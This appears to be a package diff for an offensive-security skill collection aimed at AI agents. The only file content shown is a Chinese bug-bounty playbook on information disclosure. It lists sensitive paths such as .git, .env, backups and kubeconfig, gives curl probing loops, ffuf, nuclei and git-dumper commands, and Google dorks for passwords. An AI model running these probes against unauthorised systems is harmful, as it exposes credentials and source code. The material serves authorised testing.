opencode-skills-collection 4.0.43 → 4.0.45

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (270) hide show
  1. package/bundled-skills/.antigravity-install-manifest.json +47 -1
  2. package/bundled-skills/api-rate-limit-handler/SKILL.md +282 -0
  3. package/bundled-skills/api-security/SKILL.md +205 -0
  4. package/bundled-skills/api-security/references/jwt-oauth-testing.md +123 -0
  5. package/bundled-skills/api-security/references/rest-graphql-testing.md +137 -0
  6. package/bundled-skills/apk-reverse/SKILL.md +438 -0
  7. package/bundled-skills/apk-reverse/references/android-advanced.md +365 -0
  8. package/bundled-skills/apk-reverse/references/apk-security-checklist.md +230 -0
  9. package/bundled-skills/apk-reverse/references/frida-bypass-kit.md +70 -0
  10. package/bundled-skills/apk-reverse/references/frida-cookbook.md +472 -0
  11. package/bundled-skills/attack-chain/SKILL.md +185 -0
  12. package/bundled-skills/attack-chain/references/attack-playbooks.md +126 -0
  13. package/bundled-skills/attack-chain/references/evasion-cheatsheet.md +133 -0
  14. package/bundled-skills/attack-chain/references/lifecycle-checklist.md +37 -0
  15. package/bundled-skills/attack-chain/references/phases.md +490 -0
  16. package/bundled-skills/binary-diff/SKILL.md +320 -0
  17. package/bundled-skills/binary-diff/references/prompt-template.md +173 -0
  18. package/bundled-skills/browser-extension-reverse/SKILL.md +99 -0
  19. package/bundled-skills/browser-extension-reverse/references/extension-analysis.md +10 -0
  20. package/bundled-skills/case-review/SKILL.md +167 -0
  21. package/bundled-skills/cloud-k8s/SKILL.md +124 -0
  22. package/bundled-skills/cloud-k8s/references/k8s-cloud-checklist.md +16 -0
  23. package/bundled-skills/code-audit/SKILL.md +92 -0
  24. package/bundled-skills/code-audit/references/sast-review-checklist.md +10 -0
  25. package/bundled-skills/database-security/SKILL.md +81 -0
  26. package/bundled-skills/database-security/references/db-misconfig-checklist.md +9 -0
  27. package/bundled-skills/diagram-generator/SKILL.md +199 -0
  28. package/bundled-skills/diagram-generator/references/README.md +3 -0
  29. package/bundled-skills/diagram-generator/references/diagram-patterns.md +254 -0
  30. package/bundled-skills/digital-forensics/SKILL.md +93 -0
  31. package/bundled-skills/digital-forensics/references/forensics-triage.md +10 -0
  32. package/bundled-skills/docs/integrations/jetski-cortex.md +3 -3
  33. package/bundled-skills/docs/integrations/jetski-gemini-loader/README.md +1 -1
  34. package/bundled-skills/docs/maintainers/repo-growth-seo.md +1 -1
  35. package/bundled-skills/docs/maintainers/skills-update-guide.md +1 -1
  36. package/bundled-skills/docs/sources/sources.md +9 -0
  37. package/bundled-skills/docs/users/aas-core.md +1 -1
  38. package/bundled-skills/docs/users/bundles.md +1 -1
  39. package/bundled-skills/docs/users/claude-code-skills.md +1 -1
  40. package/bundled-skills/docs/users/gemini-cli-skills.md +1 -1
  41. package/bundled-skills/docs/users/kiro-integration.md +1 -1
  42. package/bundled-skills/docs/users/usage.md +3 -3
  43. package/bundled-skills/docs/users/visual-guide.md +4 -4
  44. package/bundled-skills/docs-generator/SKILL.md +197 -0
  45. package/bundled-skills/docs-generator/references/security-report-templates.md +348 -0
  46. package/bundled-skills/docs-generator/references/templates.md +102 -0
  47. package/bundled-skills/docs-generator/references/vendor-report-rules.md +263 -0
  48. package/bundled-skills/dotnet-reverse/SKILL.md +197 -0
  49. package/bundled-skills/dotnet-reverse/references/common-workflow.md +171 -0
  50. package/bundled-skills/dotnet-reverse/references/obfuscators.md +145 -0
  51. package/bundled-skills/dotnet-reverse/references/sharp-tools.md +164 -0
  52. package/bundled-skills/edr-bypass-re/SKILL.md +248 -0
  53. package/bundled-skills/edr-bypass-re/references/hook-survey.md +226 -0
  54. package/bundled-skills/edr-bypass-re/references/telemetry-blinding.md +346 -0
  55. package/bundled-skills/edr-bypass-re/references/unhook-techniques.md +338 -0
  56. package/bundled-skills/email-security/SKILL.md +81 -0
  57. package/bundled-skills/email-security/references/email-auth-checklist.md +8 -0
  58. package/bundled-skills/firmware-pentest/SKILL.md +381 -0
  59. package/bundled-skills/firmware-pentest/references/emba-automated-analysis.md +192 -0
  60. package/bundled-skills/firmware-pentest/references/emulation-and-fuzz.md +337 -0
  61. package/bundled-skills/firmware-pentest/references/extraction-methodology.md +285 -0
  62. package/bundled-skills/ghidra-reverse/SKILL.md +98 -0
  63. package/bundled-skills/ghidra-reverse/references/ghidra-cheatsheet.md +12 -0
  64. package/bundled-skills/go-rust-reverse/SKILL.md +82 -0
  65. package/bundled-skills/go-rust-reverse/references/go-rust-notes.md +5 -0
  66. package/bundled-skills/hardware-security/SKILL.md +80 -0
  67. package/bundled-skills/hardware-security/references/debug-interface-triage.md +7 -0
  68. package/bundled-skills/ida-reverse/SKILL.md +401 -0
  69. package/bundled-skills/ida-reverse/references/LOCAL-SETUP.md +66 -0
  70. package/bundled-skills/ida-reverse/references/ida-mcp-cheatsheet.md +515 -0
  71. package/bundled-skills/identity-federation/SKILL.md +81 -0
  72. package/bundled-skills/identity-federation/references/sso-flow-checklist.md +9 -0
  73. package/bundled-skills/instructree/SKILL.md +94 -0
  74. package/bundled-skills/js-reverse/SKILL.md +239 -0
  75. package/bundled-skills/js-reverse/references/ast-deobfuscation.md +3 -0
  76. package/bundled-skills/js-reverse/references/automation-entry.md +12 -0
  77. package/bundled-skills/js-reverse/references/env-patching.md +6 -0
  78. package/bundled-skills/js-reverse/references/fallbacks.md +8 -0
  79. package/bundled-skills/js-reverse/references/instrumentation.md +9 -0
  80. package/bundled-skills/js-reverse/references/local-rebuild.md +11 -0
  81. package/bundled-skills/js-reverse/references/mcp-task-template.md +30 -0
  82. package/bundled-skills/js-reverse/references/node-env-rebuild.md +9 -0
  83. package/bundled-skills/js-reverse/references/output-contract.md +9 -0
  84. package/bundled-skills/js-reverse/references/task-artifacts.md +11 -0
  85. package/bundled-skills/js-reverse/references/task-input-template.md +11 -0
  86. package/bundled-skills/js-reverse/references/tool-defaults.md +7 -0
  87. package/bundled-skills/llm-security/SKILL.md +160 -0
  88. package/bundled-skills/llm-security/references/agent-obedience-engineering.md +243 -0
  89. package/bundled-skills/llm-security/references/agent-security-testing.md +116 -0
  90. package/bundled-skills/llm-security/references/owasp-llm-top10.md +48 -0
  91. package/bundled-skills/llm-security/references/prompt-injection-methodology.md +107 -0
  92. package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package-lock.json +4 -4
  93. package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package.json +1 -1
  94. package/bundled-skills/macos-reverse/SKILL.md +85 -0
  95. package/bundled-skills/macos-reverse/references/macho-triage.md +10 -0
  96. package/bundled-skills/malware-analysis/SKILL.md +311 -0
  97. package/bundled-skills/malware-analysis/references/anti-analysis-techniques.md +205 -0
  98. package/bundled-skills/malware-analysis/references/sandbox-orchestration.md +204 -0
  99. package/bundled-skills/malware-analysis/references/yara-sigma-rules.md +232 -0
  100. package/bundled-skills/mobile-reverse/SKILL.md +222 -0
  101. package/bundled-skills/mobile-reverse/references/anti-detection-bypass.md +182 -0
  102. package/bundled-skills/mobile-reverse/references/frida-objection-deep.md +218 -0
  103. package/bundled-skills/mobile-reverse/references/ios-reverse-guide.md +177 -0
  104. package/bundled-skills/muapi-media/SKILL.md +311 -0
  105. package/bundled-skills/ot-ics/SKILL.md +117 -0
  106. package/bundled-skills/ot-ics/references/ot-safe-assessment.md +10 -0
  107. package/bundled-skills/patch-diff-exploit/SKILL.md +278 -0
  108. package/bundled-skills/patch-diff-exploit/references/diff-tools-comparison.md +271 -0
  109. package/bundled-skills/patch-diff-exploit/references/patch-tuesday-workflow.md +253 -0
  110. package/bundled-skills/patch-diff-exploit/references/root-cause-and-poc.md +198 -0
  111. package/bundled-skills/pentest-tools/SKILL.md +346 -0
  112. package/bundled-skills/pentest-tools/references/ai-pentest-agents.md +148 -0
  113. package/bundled-skills/pentest-tools/references/ai-pentesting-landscape-2026.md +73 -0
  114. package/bundled-skills/pentest-tools/references/automation-loop-pattern.md +153 -0
  115. package/bundled-skills/pentest-tools/references/awesome-pentest-digest.md +175 -0
  116. package/bundled-skills/pentest-tools/references/burpsuite-mcp-guide.md +769 -0
  117. package/bundled-skills/pentest-tools/references/client-side-lab-playbook.md +155 -0
  118. package/bundled-skills/pentest-tools/references/kali-mcp-ecosystem.md +119 -0
  119. package/bundled-skills/pentest-tools/references/msf-protocol.md +169 -0
  120. package/bundled-skills/pentest-tools/references/network-attack-defense.md +350 -0
  121. package/bundled-skills/pentest-tools/references/nuclei-guide-2026.md +157 -0
  122. package/bundled-skills/pentest-tools/references/payloads.md +32 -0
  123. package/bundled-skills/pentest-tools/references/pentest-ai-agents-matrix.md +117 -0
  124. package/bundled-skills/pentest-tools/references/pentest-loop.md +270 -0
  125. package/bundled-skills/pentest-tools/references/recon-pipeline.md +154 -0
  126. package/bundled-skills/pentest-tools/references/templates/findings.md +21 -0
  127. package/bundled-skills/pentest-tools/references/templates/progress.md +17 -0
  128. package/bundled-skills/pentest-tools/references/templates/rules.md +35 -0
  129. package/bundled-skills/pentest-tools/references/templates/scope.md +29 -0
  130. package/bundled-skills/pentest-tools/references/templates/task_plan.md +27 -0
  131. package/bundled-skills/pentest-tools/references/web-attack-cheatsheet.md +387 -0
  132. package/bundled-skills/pentest-tools/src-hunter/SKILL.md +243 -0
  133. package/bundled-skills/pentest-tools/src-hunter/references/README.en.md +115 -0
  134. package/bundled-skills/pentest-tools/src-hunter/references/README.md +148 -0
  135. package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/00-index.md +44 -0
  136. package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/chinese-srcfingerprints.md +515 -0
  137. package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/default-credentials-cn.md +274 -0
  138. package/bundled-skills/pentest-tools/src-hunter/references/industry/00-index.md +66 -0
  139. package/bundled-skills/pentest-tools/src-hunter/references/industry/banking-finance.md +338 -0
  140. package/bundled-skills/pentest-tools/src-hunter/references/industry/telecom-isp.md +315 -0
  141. package/bundled-skills/pentest-tools/src-hunter/references/methodology/00-index.md +68 -0
  142. package/bundled-skills/pentest-tools/src-hunter/references/methodology/01-attack-priority.md +143 -0
  143. package/bundled-skills/pentest-tools/src-hunter/references/methodology/02-bypass-toolkit.md +357 -0
  144. package/bundled-skills/pentest-tools/src-hunter/references/methodology/03-evidence-discipline.md +205 -0
  145. package/bundled-skills/pentest-tools/src-hunter/references/methodology/04-control-gap-hunting.md +238 -0
  146. package/bundled-skills/pentest-tools/src-hunter/references/methodology/05-srctimebox-priority.md +161 -0
  147. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/adcs/346/224/273/345/207/273.md +254 -0
  148. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/exchange/346/224/273/345/207/273.md +254 -0
  149. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/sharepoint/346/224/273/345/207/273.md +113 -0
  150. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//344/277/241/346/201/257/346/224/266/351/233/206.md +947 -0
  151. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/205/215/346/235/200/344/270/216/350/247/204/351/201/277.md +780 -0
  152. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/207/255/350/257/201/347/252/203/345/217/226.md +1259 -0
  153. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/237/237/346/270/227/351/200/217/346/224/273/345/207/273.md +753 -0
  154. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/346/217/220/345/215/207.md +819 -0
  155. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/347/273/264/346/214/201.md +577 -0
  156. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/250/252/345/220/221/347/247/273/345/212/250.md +838 -0
  157. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//351/232/247/351/201/223/344/273/243/347/220/206.md +604 -0
  158. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ai/345/256/211/345/205/250.md +698 -0
  159. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/api/345/256/211/345/205/250.md +1935 -0
  160. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/csrf/350/267/250/347/253/231/350/257/267/346/261/202/344/274/252/351/200/240.md +952 -0
  161. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/jwt/345/256/211/345/205/250.md +496 -0
  162. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/lfi-rfi/346/226/207/344/273/266/345/214/205/345/220/253.md +1365 -0
  163. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/rce/350/277/234/347/250/213/344/273/243/347/240/201/346/211/247/350/241/214.md +1329 -0
  164. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/sql-nosql/346/263/250/345/205/245.md +1924 -0
  165. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssrf/346/234/215/345/212/241/347/253/257/350/257/267/346/261/202/344/274/252/351/200/240.md +1256 -0
  166. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssti/346/250/241/346/235/277/346/263/250/345/205/245.md +1151 -0
  167. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/websocket/345/256/211/345/205/250.md +487 -0
  168. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xss/350/267/250/347/253/231/350/204/232/346/234/254.md +1465 -0
  169. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xxe/345/256/236/344/275/223/346/263/250/345/205/245.md +815 -0
  170. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/270/232/345/212/241/351/200/273/350/276/221/346/274/217/346/264/236.md +594 -0
  171. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/272/221/345/256/211/345/205/250/346/274/217/346/264/236.md +561 -0
  172. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/276/233/345/272/224/351/223/276/346/224/273/345/207/273.md +399 -0
  173. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/216/237/345/236/213/351/223/276/346/261/241/346/237/223.md +401 -0
  174. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/274/200/346/224/276/351/207/215/345/256/232/345/220/221.md +396 -0
  175. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/226/207/344/273/266/346/274/217/346/264/236.md +0 -0
  176. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/241/206/346/236/266/346/274/217/346/264/236.md +2304 -0
  177. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/202/271/345/207/273/345/212/253/346/214/201.md +339 -0
  178. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/274/223/345/255/230/344/270/216cdn/345/256/211/345/205/250.md +497 -0
  179. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/256/244/350/257/201/346/274/217/346/264/236.md +1778 -0
  180. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/257/267/346/261/202/350/265/260/347/247/201.md +854 -0
  181. package/bundled-skills/pentest-tools/src-hunter/references/payloader/index.md +69 -0
  182. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/web/346/270/227/351/200/217.md +662 -0
  183. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/windows/346/270/227/351/200/217.md +100 -0
  184. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//344/277/241/346/201/257/346/224/266/351/233/206.md +852 -0
  185. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/206/205/347/275/221/346/270/227/351/200/217.md +873 -0
  186. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/207/255/350/257/201/347/252/203/345/217/226.md +186 -0
  187. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/237/237/346/270/227/351/200/217.md +50 -0
  188. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/257/206/347/240/201/346/224/273/345/207/273.md +462 -0
  189. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/235/203/351/231/220/346/217/220/345/215/207.md +168 -0
  190. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/274/217/346/264/236/345/210/251/347/224/250.md +445 -0
  191. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/263/273/347/273/237/345/221/275/344/273/244.md +410 -0
  192. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/272/242/351/230/237/345/267/245/345/205/267.md +64 -0
  193. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/274/226/347/240/201/350/247/243/347/240/201.md +226 -0
  194. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//351/232/247/351/201/223/344/273/243/347/220/206.md +84 -0
  195. package/bundled-skills/pentest-tools/src-hunter/references/payloader/waf-bypass.md +6504 -0
  196. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/00-index.md +57 -0
  197. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/api-rest.md +2050 -0
  198. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/arbitrary-x-authz.md +481 -0
  199. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/dos.md +615 -0
  200. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/file-upload.md +1365 -0
  201. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/graphql.md +253 -0
  202. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/http-smuggling.md +924 -0
  203. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/info-disclosure.md +432 -0
  204. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/intranet-postexp.md +4845 -0
  205. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/llm-prompt-injection.md +1394 -0
  206. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/logic-flaws.md +1796 -0
  207. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/mobile.md +397 -0
  208. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/oauth-saml-jwt.md +2504 -0
  209. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/path-traversal.md +1297 -0
  210. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/race-conditions.md +207 -0
  211. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/rce.md +4829 -0
  212. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/sqli.md +1620 -0
  213. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/ssrf-cache-host.md +2098 -0
  214. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/unauth-access.md +330 -0
  215. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/xss.md +1159 -0
  216. package/bundled-skills/pentest-tools/src-hunter/references/templates/report-submission.md +346 -0
  217. package/bundled-skills/pentest-tools/src-hunter/references/tools/mcp-jshook.md +174 -0
  218. package/bundled-skills/protocol-reverse/SKILL.md +108 -0
  219. package/bundled-skills/protocol-reverse/references/protocol-workflow.md +29 -0
  220. package/bundled-skills/pwn-chain/SKILL.md +209 -0
  221. package/bundled-skills/pwn-chain/references/heap-pwn.md +283 -0
  222. package/bundled-skills/pwn-chain/references/kernel-pwn.md +370 -0
  223. package/bundled-skills/pwn-chain/references/stack-pwn.md +312 -0
  224. package/bundled-skills/radare2/SKILL.md +460 -0
  225. package/bundled-skills/radare2/references/cheatsheet.md +129 -0
  226. package/bundled-skills/radio-sdr/SKILL.md +77 -0
  227. package/bundled-skills/radio-sdr/references/sdr-lab-rules.md +6 -0
  228. package/bundled-skills/reverse-browser-automation/SKILL.md +249 -0
  229. package/bundled-skills/reverse-browser-automation/references/playwright-cheatsheet.md +425 -0
  230. package/bundled-skills/reverse-engineering/SKILL.md +213 -0
  231. package/bundled-skills/reverse-engineering/dsl-vm-reverse/SKILL.md +388 -0
  232. package/bundled-skills/reverse-engineering/references/ai-assisted-re.md +149 -0
  233. package/bundled-skills/reverse-engineering/references/anti-analysis.md +836 -0
  234. package/bundled-skills/reverse-engineering/references/awesome-re-resources.md +135 -0
  235. package/bundled-skills/reverse-engineering/references/crypto-decode-tools.md +220 -0
  236. package/bundled-skills/reverse-engineering/references/elf-analysis.md +296 -0
  237. package/bundled-skills/reverse-engineering/references/field-notes.md +540 -0
  238. package/bundled-skills/reverse-engineering/references/go-reverse.md +240 -0
  239. package/bundled-skills/reverse-engineering/references/kernel-driver-reverse.md +298 -0
  240. package/bundled-skills/reverse-engineering/references/languages-compiled.md +587 -0
  241. package/bundled-skills/reverse-engineering/references/languages-platforms.md +486 -0
  242. package/bundled-skills/reverse-engineering/references/languages.md +499 -0
  243. package/bundled-skills/reverse-engineering/references/nonpe-format-cookbook.md +301 -0
  244. package/bundled-skills/reverse-engineering/references/ollvm-deobfuscation.md +501 -0
  245. package/bundled-skills/reverse-engineering/references/patterns-ctf-2.md +397 -0
  246. package/bundled-skills/reverse-engineering/references/patterns-ctf-3.md +719 -0
  247. package/bundled-skills/reverse-engineering/references/patterns-ctf.md +532 -0
  248. package/bundled-skills/reverse-engineering/references/patterns.md +801 -0
  249. package/bundled-skills/reverse-engineering/references/platforms-hardware.md +304 -0
  250. package/bundled-skills/reverse-engineering/references/platforms.md +442 -0
  251. package/bundled-skills/reverse-engineering/references/re-agent-workflow.md +240 -0
  252. package/bundled-skills/reverse-engineering/references/tools-advanced.md +822 -0
  253. package/bundled-skills/reverse-engineering/references/tools-dynamic.md +846 -0
  254. package/bundled-skills/reverse-engineering/references/tools.md +546 -0
  255. package/bundled-skills/supply-chain-security/SKILL.md +180 -0
  256. package/bundled-skills/supply-chain-security/references/cicd-pipeline-security.md +137 -0
  257. package/bundled-skills/supply-chain-security/references/sbom-sca-methodology.md +74 -0
  258. package/bundled-skills/thick-client/SKILL.md +104 -0
  259. package/bundled-skills/thick-client/references/thick-client-checklist.md +9 -0
  260. package/bundled-skills/threat-hunting/SKILL.md +94 -0
  261. package/bundled-skills/threat-hunting/references/hunting-loop.md +5 -0
  262. package/bundled-skills/threat-intelligence/SKILL.md +176 -0
  263. package/bundled-skills/threat-intelligence/references/x-public-intelligence.md +93 -0
  264. package/bundled-skills/tree-ring-memory/SKILL.md +29 -9
  265. package/bundled-skills/wifi-wireless/SKILL.md +80 -0
  266. package/bundled-skills/wifi-wireless/references/wireless-lab-rules.md +6 -0
  267. package/bundled-skills/windows-ad/SKILL.md +109 -0
  268. package/bundled-skills/windows-ad/references/ad-attack-paths.md +12 -0
  269. package/package.json +1 -1
  270. package/skills_index.json +1214 -2
@@ -0,0 +1,432 @@
1
+ # 信息泄露 / 敏感文件 / 备份
2
+
3
+ > 视角:黑盒,主动探测路径 + 被动收集前端线索
4
+
5
+ ## 1. 一句话说清
6
+
7
+ 信息泄露 = 服务暴露了不该暴露的资产(源码、配置、密钥、凭据、PII)。
8
+ SRC 关注:**链路终点**——一个 `.git` 泄露能直接拿数据库密码 → 提升为 P0。
9
+ WooYun 7,337 案例中 **48.7% 是敏感信息泄露**,**40% 涉及凭证 / 数据库**。
10
+
11
+ ---
12
+
13
+ ## 2. 高频入口点(按命中率排序)
14
+
15
+ ### 2.1 版本控制泄露(560 案例)
16
+
17
+ | 路径 | 含义 | 利用工具 |
18
+ |------|------|---------|
19
+ | `/.git/config` | Git 配置(含 remote 地址) | GitHack、git-dumper、dvcs-ripper |
20
+ | `/.git/HEAD` | 当前分支 | 同上 |
21
+ | `/.git/index` | 暂存区索引 | 同上 |
22
+ | `/.git/logs/HEAD` | 操作日志 | 同上 |
23
+ | `/.git/objects/` | 对象存储 | 同上 |
24
+ | `/.svn/entries` | SVN ≤1.6 入口(**393 例高频**) | svn-extractor |
25
+ | `/.svn/wc.db` | SVN 1.7+ SQLite | sqlite3 wc.db |
26
+ | `/.svn/all-wcprops` | SVN 工作副本属性 | - |
27
+ | `/.svn/pristine/` | 原始文件 | - |
28
+ | `/.hg/` | Mercurial | dvcs-ripper |
29
+ | `/.bzr/` | Bazaar | dvcs-ripper |
30
+ | `/CVS/Entries` | CVS | - |
31
+
32
+ ### 2.2 备份文件(565 案例,命中率最高)
33
+
34
+ ```
35
+ # 压缩包(530 例命中)
36
+ /wwwroot.rar /wwwroot.zip /wwwroot.tar.gz
37
+ /www.rar /www.zip /www.tar.gz
38
+ /web.rar /web.zip /web.tar.gz
39
+ /site.rar /site.zip /site.tar.gz
40
+ /backup.zip /backup.tar.gz
41
+ /{域名}.zip /{域名}.rar /{域名}.tar.gz # 例:example.com.zip
42
+ /{IP}.zip # 例:1.2.3.4.zip
43
+ /{年份}.zip / /backup_2024.zip / /old_2023.zip
44
+
45
+ # SQL(136 例命中)
46
+ /backup.sql /database.sql /db.sql /dump.sql
47
+ /{库名}.sql /data.sql /sql.txt
48
+
49
+ # 配置备份(101 例命中)
50
+ /config.php.bak /config.php~
51
+ /config.php.swp /.config.php.swp
52
+ /config_global.php.bak
53
+ /uc_server/data/config.inc.php.bak
54
+ /web.config.bak /.env.bak
55
+ /database.yml.bak
56
+
57
+ # 编辑器临时文件
58
+ /index.php.swp /.index.php.swp
59
+ /index.php~ /.index.php~
60
+ /.DS_Store /Thumbs.db
61
+ ```
62
+
63
+ ### 2.3 配置文件(明文暴露)
64
+
65
+ ```
66
+ # Java/Spring
67
+ /WEB-INF/web.xml
68
+ /WEB-INF/applicationContext.xml
69
+ /WEB-INF/classes/application.properties
70
+ /WEB-INF/classes/jdbc.properties
71
+ /WEB-INF/classes/database.yml
72
+ /WEB-INF/classes/hibernate.cfg.xml
73
+ /application.yml /application-prod.yml
74
+ /bootstrap.yml
75
+
76
+ # PHP
77
+ /config.php /config/config.php
78
+ /include/config.php /data/config.php
79
+ /conf/config.inc.php /application/config/database.php
80
+
81
+ # .NET
82
+ /web.config /App_Data/ /bin/
83
+ /connectionStrings.config
84
+
85
+ # 现代框架
86
+ /.env /.env.local /.env.production
87
+ /.env.development /.env.staging
88
+ /config.json /settings.py
89
+ /appsettings.json /appsettings.Production.json
90
+
91
+ # 容器 / k8s
92
+ /docker-compose.yml /docker-compose.yaml
93
+ /Dockerfile
94
+ /.kube/config
95
+ ```
96
+
97
+ ### 2.4 探针文件(47+34+38 命中)
98
+
99
+ ```
100
+ /phpinfo.php /info.php /test.php /1.php /i.php /t.php
101
+ /probe.php /debug.php
102
+ /test.jsp /info.jsp
103
+ /server-status /server-info # Apache mod_status
104
+ /jolokia/list # JMX
105
+ ```
106
+
107
+ ### 2.5 日志(23+ 命中)
108
+
109
+ ```
110
+ /ctp.log # 致远 OA 高频
111
+ /logs/ctp.log
112
+ /debug.log /error.log /access.log /application.log
113
+ /runtime/logs/ # ThinkPHP
114
+ /storage/logs/ # Laravel
115
+ /var/log/ # 偶尔被映射到 web 根
116
+ /WEB-INF/logs/
117
+ /_catalina.out
118
+ ```
119
+
120
+ ### 2.6 数据库管理面(46 命中)
121
+
122
+ ```
123
+ /phpmyadmin/ /phpMyAdmin/ /pma/ /myadmin/ /mysql/
124
+ /adminer.php /adminer/
125
+ ```
126
+
127
+ ### 2.7 OSS / S3 Bucket(云时代新热门)
128
+
129
+ ```
130
+ # AWS S3
131
+ https://{bucket}.s3.amazonaws.com/
132
+ https://{bucket}.s3.{region}.amazonaws.com/
133
+ https://s3.amazonaws.com/{bucket}/
134
+
135
+ # 阿里云 OSS
136
+ https://{bucket}.oss-{region}.aliyuncs.com/
137
+
138
+ # 腾讯云 COS
139
+ https://{bucket}.cos.{region}.myqcloud.com/
140
+
141
+ # 列出对象(公开 bucket)
142
+ ?list-type=2
143
+ ?prefix=&delimiter=/
144
+ ```
145
+
146
+ 工具:`s3scanner`、`gobuster s3`、`oss-attack`。
147
+
148
+ ---
149
+
150
+ ## 3. 探测手法
151
+
152
+ ### 3.1 一行命令探测
153
+
154
+ ```bash
155
+ # 版本控制
156
+ for p in .git/config .git/HEAD .svn/entries .svn/wc.db .hg/store; do
157
+ curl -s -o /dev/null -w "%{http_code} $p\n" https://target/$p
158
+ done
159
+
160
+ # 备份文件
161
+ for ext in zip rar tar.gz sql bak; do
162
+ for name in www web site backup wwwroot data; do
163
+ curl -s -o /dev/null -w "%{http_code} /$name.$ext\n" https://target/$name.$ext
164
+ done
165
+ done
166
+
167
+ # 域名 / 子域备份
168
+ DOMAIN=$(echo target.com | sed 's/\./ /g' | awk '{print $1}')
169
+ curl -s -o /dev/null -w "%{http_code} /$DOMAIN.zip\n" https://target/$DOMAIN.zip
170
+ ```
171
+
172
+ ### 3.2 自动化扫描
173
+
174
+ ```bash
175
+ # dirsearch / ffuf 配合敏感字典
176
+ dirsearch -u https://target/ -e php,jsp,asp,bak,zip,rar,sql -w wordlists/sensitive.txt
177
+ ffuf -u https://target/FUZZ -w sensitive-paths.txt -mc 200,301 -fc 404
178
+
179
+ # 专用工具
180
+ nuclei -u https://target -t exposures/
181
+
182
+ # .git 自动还原
183
+ git-dumper https://target/.git/ ./loot/
184
+ GitHack https://target/.git/
185
+ ```
186
+
187
+ ### 3.3 Google Hacking 字典
188
+
189
+ ```
190
+ site:target.com filetype:sql
191
+ site:target.com filetype:bak
192
+ site:target.com filetype:env
193
+ site:target.com filetype:log
194
+ site:target.com inurl:.git
195
+ site:target.com inurl:.svn
196
+ site:target.com intitle:"index of" .git
197
+ site:target.com inurl:phpinfo
198
+ site:target.com "db_password"
199
+ site:target.com "mysql_connect"
200
+ inurl:wp-config.php.bak
201
+
202
+ # Github / Gitee 关键字泄露
203
+ "target.com" password
204
+ "@target.com" filename:.env
205
+ ```
206
